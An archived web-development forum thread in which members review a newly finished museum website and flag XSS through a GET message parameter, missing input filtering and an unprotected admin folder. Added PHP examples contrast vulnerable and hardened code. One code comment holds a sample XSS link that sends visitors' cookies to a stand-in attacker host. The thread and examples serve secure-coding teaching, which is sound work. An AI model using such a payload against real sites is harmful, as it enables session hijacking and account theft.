Finally done - completely DONE!

It doesn't matter if you do all the error checking in the world, or if you have the most beautiful graphics, if your site or application design isn't usable, it's not going to do well. Get input and advice on usability and user interface issues here.

Luke
The Ninja Space Mod
Posts: 6424
Joined: Fri Aug 05, 2005 1:53 pm
Location: Paradise, CA

Post by Luke »

I know I've shown this site a hundred times, but it's been a long process (lots of back-end admin stuff you don't see on the site). It's finally done. What do you all think?

http://goldnuggetmuseum.com/
redmonkey
Forum Regular
Posts: 836
Joined: Thu Dec 18, 2003 3:58 pm

Post by redmonkey »

I'm loving the minimalistic approach.

Presumably there is supposed to be more on the page other than 'Coming Soon'?
Ree
Forum Regular
Posts: 592
Joined: Fri Jun 10, 2005 1:43 am
Location: LT

Post by Ree »

:lol:
RobertGonzalez
Site Administrator
Posts: 14293
Joined: Tue Sep 09, 2003 6:04 pm
Location: Fremont, CA, USA

Post by RobertGonzalez »

Dude, I'm hiring you to do my next design project. There is NO way that I could ever do what you did there... :wink:
Luke
The Ninja Space Mod
Posts: 6424
Joined: Fri Aug 05, 2005 1:53 pm
Location: Paradise, CA

Post by Luke »

haha :D
patrikG
DevNet Master
Posts: 4235
Joined: Thu Aug 15, 2002 5:53 am
Location: Sussex, UK

Post by patrikG »

Beautiful, plus it's 100% standards compliant: http://validator.w3.org/check?uri=http% ... eum.com%2F
hawleyjr
BeerMod
Posts: 2170
Joined: Tue Jan 13, 2004 4:58 pm
Location: Jax FL & Spokane WA USA

Post by hawleyjr »

Out of curiosity, why did you send the form warning messages through GET?

like this
Luke
The Ninja Space Mod
Posts: 6424
Joined: Fri Aug 05, 2005 1:53 pm
Location: Paradise, CA

Post by Luke »

You know, I'm not really sure. Should have just sent $msg=error and then had it do an if $msg == error then post "this error message", but oh well.
hawleyjr
BeerMod
Posts: 2170
Joined: Tue Jan 13, 2004 4:58 pm
Location: Jax FL & Spokane WA USA

Post by hawleyjr »

Good job on the site nonetheless.

BTW, the reason I asked is because I had a client whose site did the same, and they hired me because someone sent them an email with a screenshot where someone had changed the text in the query string to be more of a hate message.. 8O
redmonkey
Forum Regular
Posts: 836
Joined: Thu Dec 18, 2003 3:58 pm

Post by redmonkey »

The Ninja Space Goat wrote:You know, I'm not really sure. Should have just sent $msg=error and then had it do an if $msg == error then post "this error message", but oh well.
Yeah especially when you don't seem to be filtering what you're displaying...

example

I didn't try to see what other nonsense I could get up to.

Also, maybe it's just me that's seeing a (more or less) blank page with 'Coming Soon' on it when I hit http://goldnuggetmuseum.com/? From another browser I get a blank page with two question marks, which achieves nothing other than adding to the intrigue.

http://goldnuggetmuseum.com/index.php on the other hand works as intended.
RobertGonzalez
Site Administrator
Posts: 14293
Joined: Tue Sep 09, 2003 6:04 pm
Location: Fremont, CA, USA

Post by RobertGonzalez »

Wowsers, there is a site there! When I went to the URL it was a blank coming soon page (I bet that was an index.html placeholder still in place...). Anyway, now I see the site.
patrikG
DevNet Master
Posts: 4235
Joined: Thu Aug 15, 2002 5:53 am
Location: Sussex, UK

Post by patrikG »

The way it is, you've left the door to XSS wide, wide open - example. Session hijacking is another issue you should concern yourself with, along with SQL injection.

This site is asking to be cracked if you don't filter anything coming from the outside (i.e. HTTP-requests: $_POST, $_GET, $_REQUEST) - for some background, read http://www.sitepoint.com/blogs/2004/03/ ... strangers/
http://www.sitepoint.com/article/php-security-blunders
http://www.sitepoint.com/article/sql-in ... tacks-safe

Handing this site over to the client as is would be very, very bad practice and, imho, irresponsible.
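To make the point in the last few posts concrete, here is an added example (not code from goldnuggetmuseum.com or from anyone in this thread) of the reflected-GET pattern hawleyjr and redmonkey describe, beside a hardened version of the kind Luke sketches: the handler sends a short error code, and the page maps that code to text it wrote itself. The parameter name `msg`, the page name `contact.php` and the message table are assumptions. It covers the XSS point only; the session and SQL injection issues patrikG raises are separate.

```php
<?php
// Added example (not the site's own code): reflected GET message, vulnerable
// form beside hardened form. Parameter and page names are assumptions.

declare(strict_types=1);

// --- Vulnerable: whatever is in ?msg= is echoed straight into the page. ---
// Anyone can craft a link such as
//   contact.php?msg=<script>document.location='http://evil.example/?c='%2Bdocument.cookie</script>
// and whoever follows it runs that script in the site's own origin (or, as in
// hawleyjr's story, simply sees a hate message under the site's branding).
function render_message_vulnerable(array $get): string
{
    $msg = $get['msg'] ?? '';
    return "<p class=\"error\">$msg</p>";
}

// --- Hardened: the handler sends a code, the page owns the text. ---
// Only codes present in this table are ever turned into HTML, so a visitor
// controls nothing that reaches the page.
const ERROR_MESSAGES = [
    'empty' => 'Please fill in all required fields.',
    'email' => 'That e-mail address does not look valid.',
    'mail'  => 'Sorry, your message could not be sent. Please try again later.',
];

function render_message_safe(array $get): string
{
    $code = $get['msg'] ?? '';
    if (!array_key_exists($code, ERROR_MESSAGES)) {
        return '';   // unknown or tampered code: show nothing at all
    }
    // Escape anyway, so a future edit to the table cannot reintroduce markup.
    $text = htmlspecialchars(ERROR_MESSAGES[$code], ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<p class=\"error\">$text</p>";
}

// When the form handler has to bounce back to the page, it should only ever
// put a known code in the query string, never free text.
function redirect_with_code(string $code): void
{
    if (!array_key_exists($code, ERROR_MESSAGES)) {
        $code = 'mail';
    }
    header('Location: contact.php?msg=' . rawurlencode($code), true, 303);
    exit;
}

// Demonstration on constructed input (not a real request).
$attack = ['msg' => '<script>alert(1)</script>'];
echo render_message_vulnerable($attack), "\n";   // the script tag reaches the browser
echo render_message_safe($attack), "\n";         // empty: the code is not in the table
echo render_message_safe(['msg' => 'email']), "\n";
```

The same rule applies to anything else the site echoes back (search terms, form values re-filled after an error): either it comes from a list the page owns, or it goes through htmlspecialchars() with ENT_QUOTES and an explicit charset before it touches the HTML.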
RobertGonzalez
Site Administrator
Posts: 14293
Joined: Tue Sep 09, 2003 6:04 pm
Location: Fremont, CA, USA

Re: Finally done - completely DONE!

Post by RobertGonzalez »

The Ninja Space Goat wrote:I know I've shown this site a hundred times, but it's been a long process (lots of back-end admin stuff you don't see on the site). It's finally done. What do you all think?

http://goldnuggetmuseum.com/
Hey Ninja, just so you know, when you visit the link above the page shown is made up of the following code...

Code:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
 <head>
  <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
  <title>Paradise Gold Nugget Museum - Coming Soon!</title>
  <link href="style.css" rel="stylesheet" type="text/css" />
 </head>
 <body style="margin: 0; padding: 0;">
  <div style="padding: 75px"><img src="comingsoon.gif" alt="" /></div>

  <div style="border-top: 2px solid black;border-bottom: 2px solid black; height: 204px; padding-left: 100px;"><img src="main.jpg" alt="Coming Soon" /></div>
 </body>
</html>
The site loads fine when you use http://goldnuggetmuseum.com/index.php. Do you have an index.html file on the server?
RobertGonzalez
Site Administrator
Posts: 14293
Joined: Tue Sep 09, 2003 6:04 pm
Location: Fremont, CA, USA

Post by RobertGonzalez »

Another thing. You really should lock down your administration folder. It looks nice though 8). But it should probably be behind a password protected form of some sort.

EDIT: Sorry, maybe that was just your tinyMCE implementation test. Still looks nice.
patrikG
DevNet Master
Posts: 4235
Joined: Thu Aug 15, 2002 5:53 am
Location: Sussex, UK

Post by patrikG »

regarding the administration folder: put it behind HTTP-Authentication - easy and secure. As everah said, I didn't even have to log in... 8O
Last edited by patrikG on Wed Apr 05, 2006 10:52 pm, edited 1 time in total.
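As an added example of the HTTP authentication patrikG suggests (not the site's own code, and not something anyone in the thread posted), this is a guard that every script in the administration folder would require() before doing anything else. The file name admin/auth.php, the realm, the username and the stored hash are all assumptions; the placeholder hash must be replaced with a real password_hash() result before it lets anyone in.

```php
<?php
// Added example (not the site's own code): admin/auth.php, a guard that each
// admin script require()s first, so the browser's Basic Auth prompt protects it.
// File name, realm, username and hash are assumptions.

declare(strict_types=1);

// Store only a password_hash() result, never the password itself. Generate with:
//   php -r "echo password_hash('the real password', PASSWORD_DEFAULT), PHP_EOL;"
const ADMIN_USER = 'curator';
const ADMIN_HASH = '$2y$10$REPLACE_WITH_REAL_HASH';   // placeholder, not a working hash

// True only when both username and password match; never echoes or logs them.
function admin_credentials_valid(?string $user, ?string $pass): bool
{
    if ($user === null || $pass === null) {
        return false;
    }
    // Verify against a dummy hash when the username is wrong, so response
    // time does not reveal which usernames exist. The dummy is built once.
    static $dummy = null;
    if ($dummy === null) {
        $dummy = password_hash(bin2hex(random_bytes(16)), PASSWORD_DEFAULT);
    }
    $user_ok = hash_equals(ADMIN_USER, $user);
    $pass_ok = password_verify($pass, $user_ok ? ADMIN_HASH : $dummy);
    return $user_ok && $pass_ok;
}

// Challenge the browser and stop unless valid credentials arrived.
function require_admin_auth(): void
{
    $user = $_SERVER['PHP_AUTH_USER'] ?? null;
    $pass = $_SERVER['PHP_AUTH_PW']   ?? null;
    if (!admin_credentials_valid($user, $pass)) {
        header('WWW-Authenticate: Basic realm="Gold Nugget Museum admin"');
        http_response_code(401);
        exit('Authentication required.');
    }
}

require_admin_auth();
```

Two caveats worth knowing before relying on this: Basic Auth sends the username and password base64-encoded on every request, so it only keeps them private over HTTPS; and PHP fills $_SERVER['PHP_AUTH_USER'] itself only when it runs as an Apache module, so under CGI or FastCGI the Authorization header has to be passed through to the script (typically with a rewrite rule). Letting the web server do the same job with its own Basic Auth configuration for the admin directory avoids the second problem and covers every file in the folder, including any the PHP guard was forgotten in.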